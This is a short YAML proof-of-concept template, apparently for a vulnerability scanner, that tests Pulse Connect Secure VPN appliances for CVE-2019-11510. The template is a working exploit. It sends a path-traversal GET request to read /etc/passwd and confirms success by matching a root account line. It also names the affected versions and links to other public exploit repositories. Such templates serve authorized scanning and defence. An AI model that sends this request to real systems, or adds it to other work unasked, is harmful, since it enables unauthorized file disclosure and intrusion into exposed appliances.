name: poc-yaml-pulse-cve-2019-11510
rules:
  - method: GET
    path: >-
      /dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/
    follow_redirects: false
    expression: |
      response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
detail:
  author: leezp
  Affected Version: "Pulse Connect Secure:  9.0RX  8.3RX  8.2RX"
  links:
    - https://github.com/jas502n/CVE-2019-11510-1
    - https://github.com/projectzeroindia/CVE-2019-11510